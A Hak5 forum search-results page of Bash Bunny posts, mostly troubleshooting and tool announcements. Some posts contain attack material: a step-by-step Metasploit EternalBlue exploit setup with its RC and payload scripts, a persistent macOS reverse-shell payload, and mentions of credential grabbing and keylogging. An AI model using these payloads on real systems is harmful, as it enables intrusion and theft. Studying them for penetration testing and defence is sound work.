Jump to content

Search the Community

Showing results for tags 'bashbunny'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
    • Plunder Bug
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 84 results

  1. My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny Thanks to Astr0baby, iam just a sharer of his excellent thoughts Lets go..... Make sure to set some date for TLS/SSL to work ;) # date -s "20170925" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.4.1 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.4.1 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "user@example.com" # ./msfupdate Check the /etc/dhcp/dhcpd.conf range - and set to only one value range - Save this to ~/metasploit-framework as cmd.rc ----- use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST set CMD cmd.exe exploit ----- The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked) If the target is locked we can use another payload such this one So RHOST would be again and LHOST … This can be easily scripted via Metasploit RC script so ;) The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position . So ideally this would look like this (switch1 or switch 2) payload.txt #!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on .. After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)
  2. Hallo!! This is my payload, just a python smb server thats points to the switch folder. PROBLEM: it creates the share, but i cant access the files, because the /root/udisk is not mounted. If i boot the bunny in RNDIS, goto the console and do "udisk mount" i can access the files, but I cant mount udisk from inside a payload Any ideas? Is there anything I'm missing. Thx, and keep on developing!! :) #!/bin/bash LED SETUP GET SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot LED STAGE1 ATTACKMODE RNDIS_ETHERNET udisk mount python /tools/impacket/examples/smbserver.py e $SWITCHDIR & LED FINISH
  3. Reverse Shell Mac for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. Targets MacOS (OSX may work but has not been tested) Connection can be closed and reconnected at any time Deploys in roughly 30 sec (working on making it faster) Works well with NetCat as the listener Requirements Have a working Bash Bunny :) and a victim with MacOS STATUS LED STATUS Purple Setup Amber (Single Blink) Installing connect.sh script Amber (Double Blink) Creating cron job White (Fast Blink) Cleaning up Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from MacPersistentReverseShell to either switch folder Edit the connect.sh file and replace the placeholder IP with attacker's IP and the port with whichever port you like to use (I use 1337 ?) Save the connect.sh file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the connect.sh file on whichever program you'd like (I use NetCat) If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh) Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) Once a bash shell prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download.
  4. So I wanted to know if this was safe. I made a bunny script that when plugs into a Windows PC would upload specific files to a folder in my gdrive. I made this a project for myself because i was bored. I manipulated the "SmartFileExtract_Exfiltrator" code and used a gdrive software to make it work. How bad can this be and should it even exist at all?
  5. Hi, I got internet connection working, ssh'd in. Did apt-get update, then apt-get upgrade. Now Im unable to get any result of GET TARGET_IP I did the firmware reset, but am still having issues LED R SOLID ATTACKMODE ECM_ETHERNET LOOTDIR='/root/udisk/loot/IP' mkdir -p $LOOTDIR GET TARGET_IP echo "IP: $TARGET_IP" >> $LOOTDIR/IP.log LED G SOLID Running the above now gives me a file without the Target IP within. Any Ideas?
  6. This is a little later than i had liked but im finally ready for an 'Alpha' Release. From the team that brought you https://ducktoolkit.com i am happy to announce https://bunnytoolkit.com Concept is fairly simple. All the payloads that are in the github can be opened in the browser. You can then edit the files in the browser make changes as you like and once your happy with changes click the download button to get your payload folder. Copy the contents of this in to a switch position and away you go. For those who need a quick way of creating your own payloads we have the custom payload wizard. Answer some questions or pick a template and when you click finish you get a page that contains all the base templates which you can then add your own code to and save it as you do with the payload editor above. I will continue to add more custom features to the wizard and welcome any feedback or thoughts you may have.
  7. I am trying to edit the password grabber payload.txt so that the Finish LED will only turn on once laZagne.exe has finished and closed, because right now it turns on after 10 second while laZagne is still running, which if i remove the usb at that point, all of the excavated passwords are lost. i'd like it to work similar to powershell where if i Start-Process -filepath -wait it will wait to move on to the next line until the process has finished. issue is, WAIT on the bunny script means Wait for switch position change, and for some reason i cant seem to get grep to find the word password in the password.txt file Any assistance/suggestions are appreciated, i just want the finish led to actually mean finished.
  8. See some people getting stuck with updating bunnies and tools etc. so put together quicklist of what I did from a brand new bash bunny on my linux box. I'm sure there are some differences with OSX and windows but in general with adaptation or tweaks this should work for all as a general outline. 1. Read the wiki - seriously even if you dont remember it all, know where it is and use it for reference. 2. Switch position to 3 (closest to USB) and insert to pc. With mine I got a blue light. I also backed up the original payloads dir but its not required. 3. Clone the payloads github locally or download the zip and extract the contents. 4. Copy the payload folder you just cloned or extracted to the bash bunny storage and overwrite all. You now have latest payloads. At this point if you were to unplug the bunny, select switch 1 or 2 and then reinsert you would see a purple light rather than the blue one that came from factory (at least mine did). 5. Some payloads require dependencies such as quick creds. You install the dependencies using the tools_installer payload So its worth running this payload as your first payload. On the Bashbunny storage delete the payload in switch 1 or 2 and then CUT the contents of /payloads/library/tools_installer/ to the switch folder of choice. DONT copy it as there is a slight bug if you have 2x copy’s of this payload on the bashbunny storage when its run. Unplug the bunny and select the switch to match where you placed the payload and reinsert the bunny. If all goes well you should eventually see a white LED. if you see red LED you may need to check the forums. From this point your ready to try other payloads or start developing new ones. Talking of which I almost forgot DuckToolkit adds support for new languages. and uses the Ducktoolkit python library for encoding. I had some issues getting the bunny online with ICS on linux but was mostly down to me not reading things in the bb.sh ICS script but I will point them out in case others do the same. 1. A factory fresh bashbunny can only ICS when switch is in position 1 or 2 not in arming mode position 3. There is no Ethernet device on a factory fresh bunnny in arming mode. 2. When you download and run the bb.sh it should be first run without the bashbunny inserted and when the script gets to stage 3 you insert the bashbunny to complete the guided config. 3. Just because you configured the bb.sh does not mean your online, you still need to hit C to connect with the current configuration and start ICS. So from here you should have Bashbunny with up to date payloads, dependencies installed and are able to ICS to get it online if required. Hope this helps some people.
  9. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  10. The Bash Bunny is brilliant. It can already emulate USB devices such as keyboards, USB to Ethernet adapters, serial devices and mass storage devices. I don’t know how Hak5 have implemented the emulation features, but I imagine the Bash Bunny could potentially emulate other USB devices...? My question is what other USB devices would be really interesting to see implemented? How about USB fingerprint readers, for example? Could this allow a current PC to divulge information about a user’s fingerprint, or perhaps allow another fingerprint to be loaded onto the system? I’m really interested in how this could be implemented, and what devices could be emulated. Please let me know what you think! -MB60893.
  11. Hello Guys! First a big welcome to all! I got some HAK5 gear and I'm very fascinated from them. I've also read here since I've got the first gear to find help. And usually I've got a solution for me - but now I don't know how to go on... My BB won't write special chars. Neither with german language file nor with standard US language... All upper- and lowcase letters an numbers are working without problems. But special chars... Nothing... Frist I thought it's the german .json file becuase there where no Umlauts and some special chars seemed to have the wrong scancode. So I wrote my own .json file - Nothing.... Next day the new german .json with Umlauts was available - Nothing I have tried all commands I found anywhere to change language: - Nothing LANGUAGE='de' LANGUAGE=de LANGUAGE= de DUCKY_LANG='de' DUCKY_LANG=de DUCKY_LANG= de +DUCKY_LANG=de +DUCKY_LANG= de +DUCKY_LANG='de' QUACK SET_LANGUAGE de QUACK SET_LANGUAGE 'de' SET_LANGUAGE de SET_LANGUAGE 'de' So I've decided to try out with US Language. Changed keyboard language - Nothing.... I get no special chars... Anyone an idea I can try yet? Thanks and lovely Greets :-)
  12. I desided find my Bashbunny today and to update it to firmware 1.5 and find some nice scripts I could test on it. I tried the Password Grabber. After I run the PasswordGrabber on the Bashbunny and checked the lootfolder, I noticed it was alot of strange content in it. Alot of folders and other files that I could not open. Check attatched screen. After wondering about it, I was gonna check the size of it, and it says 56TB ? I am not able to delete the lootfolder from either windows or linux by rm -rv. I just get an errormessage that it's readonly and I don't have permissions to do that! Strange I have tried this: Remove the lootfolder Move the lootfolder to another folder, then delete (that's what I've doing on the screenshoots attatched to this post) Do a factoryreset on the bashbunny upto several time. (Unplug three times on green blink) Even upgraded by the bashbunny upgradetool and manually by downloading the .tar file and copy it into the root of the bashbynny Do any of you have any ideas how I can recover my bashbunny and hopefully bring it back to life?
  13. I have been trying to figure out a problem with this payload and for some reason I just cant get it work i have impacket in my tools file and installed when I plug my Bunny in it goes throw the colors but it gets stuck in the blue color and i cant figure out why? Do anyone have the same problem?
  14. So, it has been a bit since I did any work on the BBTPS so posting some work I began doing on it. First, I have gotten some messages about the BBTPS needing to use npm to get Express before adding to Bunny. If you pull the No_Express branch, you will only need to copy it to the Bunny. No Node dependencies needed. That one had the web server rewritten to use core modules instead of addons. First, current bug: If your script is huge and you specify it to be a process, it may not run. This is due to the cmdline 8191 character limit. The process launcher in the BBTPS launches a new powershell process with your script as a compress/encoded command. If it is too big, it gets truncated. I am working on a different method so any size script could be fired as a process. Running it in a thread works fine since it runs as a job script within the agent. Work around would be to store the script in the /loot/bbtps folder and have a script in your joblist as a process that pulls the main script through SMB server that is running and execute it. What led to this discovery was another user pointing out issues with Powercat I included, which is a huge script and broke because of the limit. Stuff I am working on: Welp, for one I am refactoring the node server. This is to make it easier to future changes that require changes to the server which leads into the next change. The quack scripts control are being moved over to the node server. The launcher for the agent will not launch directly from the payload.txt but by the node server when it comes online. This will reduce the stager size since I will not need the looping wait counter to wait for the server to come up anymore. A new field is being added to the joblist.json schema called admin that will be boolean. This field specifies if the script requires admin rights. This leads to the new feature I am working on Autoadmin. No need to guess if the user is admin or not. The BBTPS will fire off a non-privilege command prompt. It will then fire a non-hidden stager that will pull down stage1 which will check for certain requirements. After checking, a signal is sent back the the node server running on the Bashbunny. The signal depends on if the user is a local admin or not. If they are then the signal will cause the Bashbunny node server to quack out the commands in the still open cmd prompt to launch a hidden stager elevated and even quack out the keystrokes to select yes. If the user is not admin then a normal hidden stager is launched with no extra keystrokes needed. On the server the joblist it has will filter out admin jobs if the user is not admin or keep them and run them with the non-admin jobs if user is admin. Non-admin jobs always run. Reduction of config files...well by 1. I am removing the payselect.txt file for config selection. It can be done from within the payload.txt file. The joblist.json file that lists the scripts is still there (how else are you going to be able to have different lists of scripts to run ready to go?) and the config file for the joblist is still needed to be configured (this is how you select the folder that has your scripts and the joblist file to use along with the quack delays and other fine tunings or do all your joblists work the same way?). The other files are still needed to preconfigure all your different job packs so if you want to switch, you just need to change the config file name in the payload.txt. HoppEye8x by H8.to. This will come in a later version as I am still working out a good way to implement this though would extend the possibility of being able to on the fly select out of 8 preloaded jobpacks you preconfigure to launch. This would extend the number of scripts you can run by 8x the number of scripts you have configured in each jobpack per. More work on instructions. I figured out I had issues with my instructions because I was trying to instruct on proper powershell module writing at the same time (which is not required for the BBTPS to work with but makes them way more easier to be ported around in into different jobpacks). New instructions will only include how to install, where all the configuration is done and their mean and use the current sample I have as an example of how it works so the samples will include the new methods. Just to reiterate, the BBTPS is a tool, not a payload. Payloads included with the BBTPS and jobpacks created from them in the repo are from other projects and there as example of usage not as included functions of the tool.
  15. Hello everyone, I've made a notepad++ syntax file for bashbunny script. If you want you can download it from my GitHub. https://github.com/CIPH3R0/Bashbunny-syntax C1PH3R "Don't look at the branch of the problem, look at the root (C1PH3R)"
  16. Hello: I have a BashBunny plugged into a Windows laptop and I want to connect to it via the serial port. Before posting this question I searched the forums on serial port and didn't get any related results back. In Device Manger, it shows up as COM3. This is my PuTTY config: Serial -- COM3 115200, 8, N, 1 When I launch the console, it just hangs there. When I bang on the Enter key, it just hangs there. Nothing happens... I never get a prompt. Any thoughts? Thanks!
  17. Link to GitHub: https://github.com/CIPH3R0/bashbunny-payloads/tree/master/payloads/library/KeyHopper The way to have a keylogger installed in seconds! Tell me what you think! C1PH3R "Don't look at the branch of the problem, look at the root (C1PH3R)"
  18. having just bought the Bashbunny today i was so excited to get it working and do all sorts of things with it after having to wait for a week for it to ship to where i live :3, when i got it i updated the firmware using the osx bashbunny updater tool which worked great and that had me think that it was all going to be smooth sailing from there, but i got this feeling that things that have to do with IT never ever work that simply (at least with me) and luck would have it that i didn't have my windows box with me as i am traveling and i carry my mac with me as it is my daily driver. The suffering began when i wanted to share the internet connection with the bunny via the method which involves running a squid proxy, i followed the guide to the letter, but for some reason or another i couldn't run squid with the -Z command nor did i get it to work for me, after long hours of fiddling with it i decided to give up on that method and tried to look in the forum as well as youtube for another solution i found people suggesting running a payload which will test the connection, and fiddling with the internet sharing in mac (which gave me a massive headache because at times it would let me ssh to the bunny and disconnect the internet from my pc or it would let use the internet and not be able to ssh into the bunny) in the end i almost cried while staring at my terminal window with lifeless eye's it dawned on me that i have a very small linux box that i carry around with me (because in my head it makes sense and i convince myself that i'll find some use for it sometime) The raspberry pi which i lugg around which i haven't used for a while proved to be my savior, and so i boot it up i run the guided setup script and it works. but imagine this i'm sitting in my moms house on a sofa with a macbook connected to a raspberry pi connected to a bashbunny for the soul reason of wanting to update the linux distro on the bash bunny. Ps: the Guided Setup had me walk the walk of shame a couple of times during the setup process where it made you disconnect the bunny and connect it again. This might not be relevant to the topics that people usually post here (sorry if that's the case) but i had a lot of fun with this and i wanted to share it with someone xD.
  19. Hey there guys, I'm new to the BB and Hak5 forums, but decently familiar with computers in general. My issue is when using any payload asking for a tool, it just doesn't seem to work. Depending on the payload I get a failed LED. Mostly talking about PasswordGrabber but I've tried many. I feel that somehow I'm not installing the tools correctly or putting them in the wrong directory. Some of the advice out there seems to be for old firmware and have changed. Here is what I have done so far: plugged the BB in my PC and played around with a few ducky scripts. It worked great. copied the payload directory from github and tried several credentials payloads to no avail. Used bashbunny updater and updated to 1.5_298. No dice. I moved to a second PC, disabled antivirus and malware services. No difference. I tried some payloads again and they added folders to loot directory but they were empty. I figured out I needed a few tools so I added the .deb to tools folder in arming mode. Safely ejected and reinserted. I assume they installed. Specifically per the instructions I added the LaZagne.exe to the switch location and tools folder. Tried again and it didn't work. I puttied into the BB via serial and poked around. The only directories there were: loot, udisk, version.txt. All of which were empty except loot which had a few folders of password grabber and quickcreds. Those folders were empty. So I want to restate that powershell commands, ducky script and bash commands work fine to my knowledge. It seems to fail when using external tools, although I could be wrong. Also, maybe just something I have to learn how to fix but RNDIS does not ever get an IP address. Does the BB spit out logs anywhere? Any help would be greatly appreciated. 0rang3
  20. Anyone got any ideas of replacing the casing on the switch of the Bash Bunny? https://imgur.com/a/YHIco
  21. Hi there, I just made a small addition to Darren Kitchen's wait.sh for social engineering. If you have to social engineer your way to your target computer, you can just call "SEWAIT" at a suitable part of your payload. BB will be connected as STORAGE and you can download whatever file to your victim user and show it to him. BB will wait until you change the switch position and then start your original payload. Please be aware that if your payload utilizes "GET SWITCH_POSITION" you should call this before "SEWAIT"... Here is the link to the pull request: https://github.com/hak5/bashbunny-payloads/pull/327
  22. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after i infected a machine. And also if S. E. T is working :) Thanks in advance :)
  23. I've been trying all day to fix my bash bunny, but nothing seems to work. I've been trying all kinds of payloads on the GitHub repo and even making one my self. The issue I'm having is that the bash bunny won't do anything when I plug it in, but it's still recognized though. Keep in mind that I got my bash bunny yesterday so I'm not good at managing it. So if you think I'm making a beginner mistake Just go ahead and tell me. Hope you can help me, thanks!
  24. Hey, I have made a group to build, programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  25. Hey, I'm having a problem with the BB and just want to know if I'm the problem or if there are more people with the same issue. I got the BB a few days ago, and I'm trying to use the PasswordGraber. I managed to get it working, but everytime I reboot in Arming Mode (or disconnect and re-connet) , the "tools" folder gets empty, and with that, I`m losing the lazaGne.exe, so everytime I want it to work I need to copy the .exe back to the "tools" folder. Thanks, and hope I can find some help.
  • Create New...